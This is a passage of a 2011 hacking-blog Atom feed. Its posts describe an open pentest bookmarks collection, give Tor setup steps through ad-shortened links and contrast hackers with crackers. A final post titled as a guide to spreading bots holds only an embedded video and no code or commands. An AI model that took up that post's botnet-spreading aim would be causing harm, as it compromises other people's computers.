&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;How it&#39;s working atm:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;First off, we need help. OCD organizational people and people who can contribute or sort out the best links. Comment on the wiki if you wanna pitch in. Free beer at con&#39;s ;)&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;The whole bookmarks html file is ready for import to firefox off of the downloads section. As people submit new links we will add them and restructure the categories as they expand. Otherwise the wiki page should have all the links piecemeal should you not decide to download the whole folder (which is lame).&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;How to submit your bookmarks:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Since a bookmarks file is not really what you usually use a code repository for we opted just to use the download and wiki sections of google code.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;If you have suggestions or a few links to submit, leave a comment on the wiki page.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Not all links submitted will be added.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;If you think you have a large set of bookmarks you think can contribute email us and we might add you to the contributors section.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;FAQ:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Why not use a social bookmarking site?&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Well, we don’t really like them. They offer tagging but as long as we keep the list categorized well we will stick with this format… for now. Again this is the OPEN Pentest Bookmarks Collection so feel free to port it if you so desire.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Why didn’t my bookmark make the cut?&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;We hate to be choosy with an open source project but we wanted to keep the bookmarks very fresh and relevant. Who made us judge and jury? um… googlecode apparently. Hell, we even plan on pruning some of the initial ones we picked out (don’t worry all revisions should be documented). If your link didn’t make it, we apologize, we have only so many categories and we don’t want the collection to headsplode too fast.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Can I help with parsing/project work?&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Right now we have 4 owners and 1 contributor who are contributing part time and it’s enough. We will reach out if we need some more people. Thanks for all offers =)&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;The general categories are:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Forums:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. Needs some help. I don&#39;t really frequent too many underground forums but i actually find nice one-off scripts and info i can roll into my own code in these places. Would like to add more.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Blogs Worth It:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;OSINT Sites:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;OSINT has become a hug part of the pentest methodology. From fueling social engineering, to passively profiling your target infrastructure. There are subfolders for Presentaions on how-to, sites for profiling people and organizations, ans sites for profiling technical assets. This section is doing okay atm.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Exploits and Advisories&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Places to go for exploit descriptions, white-papers, and code. Needs work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Exploitation Intro&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;If you&#39;d like to get into exploit dev, these are really the guides and docs that will start you off in the right direction. Since Exploit dev is not my primary occupation this section could always use help.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Agile Hacking&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Mostly collections of guides on non-tool command line hacking syntax. Heavily inspired by Ed Skoudis and PDP of GNUCitizen. Needs work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Cheatsheets and fu!&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Random cheatsheets for heavily used tools and reference. Need a lot of work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;*nix &amp;lt;3&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Collection of *nix command line knowledge and distributions for pentesting. Needs work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Training/Classes&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Open source classes relating to hacking and penetration testing. I would really like to find more of these.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Methodologies&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Some practical and some high level methodologies for hacking related activities. Needs a lot of work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Labs&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;If you want to practice your fu, these links to test sites, blogs about practice, and lab setup-how to&#39;s will help. needs work, would like to convert to direct links as well.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Tools&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Semi-parsed, nor has it really been inspected for relevancy. More of just a place i dump links for new tools and tools i use often. Needs a LOT of help, parsing, additions, etc.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Web Vectors&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;I do a lot of web stuff. Here are some web vectors and associated useful docs and cheatsheets on each of them. Could always use more in these sections.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Misc Sec&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Not categorized, misc, and randomness.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;MiTM&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;It&#39;s not even parsed yet, nor has it really been inspected for relevancy. needs lots of work.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Hacker Media&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Needs additions to main pages of con video archives. It&#39;s an okay start though. Needs work.&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/7822963782123160593/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/penetration-testing-bookmarks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7822963782123160593'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7822963782123160593'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/penetration-testing-bookmarks.html' title='Penetration Testing Bookmarks'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-8931824259176586662</id><published>2011-05-24T23:26:00.000+05:30</published><updated>2011-05-24T23:26:36.068+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous"/><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Setting up Tor</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Windows:&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;left&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Go download Tor &lt;a href=&quot;http://adf.ly/1axkn&quot;&gt;here&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;After downloading Tor:&lt;/div&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li align=&quot;justify&quot;&gt;Run the .exe&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Extract to your PC.&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;You will now have extracted TOR into the selected folder. You should have a button called “Start Tor” with an onion on it, click this to start (if you want you can make a shortcut by right-clicking create shortcut and drag it to your desktop, make sure the original stays in the same folder though).&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;You are good to go, if your ISP blocks connections to TOR and you need help setting up a bridge.&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Linux:&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li align=&quot;justify&quot;&gt;Download Tor &lt;a href=&quot;http://adf.ly/1axmd&quot;&gt;here&lt;/a&gt;&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Extract to destination of your choice&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;You should now be able to just click your start tor button to start.&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;For additional ease of use, try Tor Button for Firefox&lt;/li&gt;
&lt;/ol&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Mac OS X:&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li align=&quot;justify&quot;&gt;Download Tor &lt;a href=&quot;http://adf.ly/1axnX&quot;&gt;here:&amp;nbsp;&lt;/a&gt;&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Mount the .dmg file and find it on your desktop&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Move Vidalia to your applications folder&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;&amp;nbsp;Download the Tor button for Firefox here: https://www.torproject.org/torbutton/index.html.en&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Once you have both installed, run Vidalia and make sure it says ”Connected to the Tor Network!” and then go to your Firefox browser and right click on the indicator in the bottom right and click “Toggle Tor Status”&lt;/li&gt;
&lt;li align=&quot;justify&quot;&gt;Read more on operating Tor &lt;a href=&quot;http://adf.ly/1axoH&quot;&gt;here&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;div align=&quot;justify&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;A NOTE FOR ALL OS’s:&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li align=&quot;justify&quot;&gt;To check anytime if TOR is working, you can go here: https://check.torproject.org/ and it will tell you if your TOR is working.&lt;/li&gt;
&lt;li align=&quot;justify&quot; style=&quot;text-align: left;&quot;&gt;Highly reccomended is the TOR button for firefox: https://addons.mozilla.org/en-us/firefox/addon/torbutton/ which will allow you to turn tor on/off as well see if it’s disabled in your browser.&lt;/li&gt;
&lt;/ol&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;b&gt;Anonymous Browsing Using Tor Button for Firefox&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Start by install Tor on your computer and configuring it to your liking. Then, download the Tor Button add-on for Firefox, and use the options to configure the add-on the way you want it. Then, press the “Tor Button” and go to a test website to ensure you’ve done it correctly. If the website returns properly anonymous results, then you’ve correctly set up Firefox for anonymous browsing through Tor.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Troubleshooting: refer to&amp;nbsp;&lt;a href=&quot;http://adf.ly/1axkn&quot;&gt;www.torproject.org&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Credit goes to&amp;nbsp;RTZHACKER&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/8931824259176586662/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/setting-up-tor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8931824259176586662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8931824259176586662'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/setting-up-tor.html' title='Setting up Tor'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-7658940587672530452</id><published>2011-05-24T23:19:00.000+05:30</published><updated>2011-05-24T23:19:01.174+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>Hackers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Who is a hacker, and what does he do?&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;A hacker is a computer enthusiast, someone good at what he does, and all-around intrigued by technology. He&#39;ll spend all night trying to solve a particular problem, to make a patch to make a program function properly, just to do it. Not because he personally benefits from it, or he&#39;s getting paid to do so. Hackers are the ones who built many of the things we use today, and did a damned good job doing it.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;What is a cracker, and what does he do?&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;A cracker is someone with some of the knowledge a hacker has, sometimes an equal amount. The difference between them is the Hacker builds things while the Cracker breaks(into) them. A cracker is one who searches for vulnerabilities only to exploit them, commonly without intent to even inform the admin of them. Crackers are the ones you see on the news stealing credit card numbers, all that type of thing.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;color: cyan;&quot;&gt;Credit goes to BluexXxKalishnikov&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/7658940587672530452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7658940587672530452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7658940587672530452'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers.html' title='Hackers'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-4878681101079081826</id><published>2011-05-24T23:13:00.000+05:30</published><updated>2011-05-24T23:13:31.442+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Botnet"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>How To Spread Bots. 600 bots in 3 days!!!!!!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/eNPSMCbUGS4?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/4878681101079081826/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/how-to-spread-bots-600-bots-in-3-days.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4878681101079081826'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4878681101079081826'/><link rel='alternate' type='text/html' 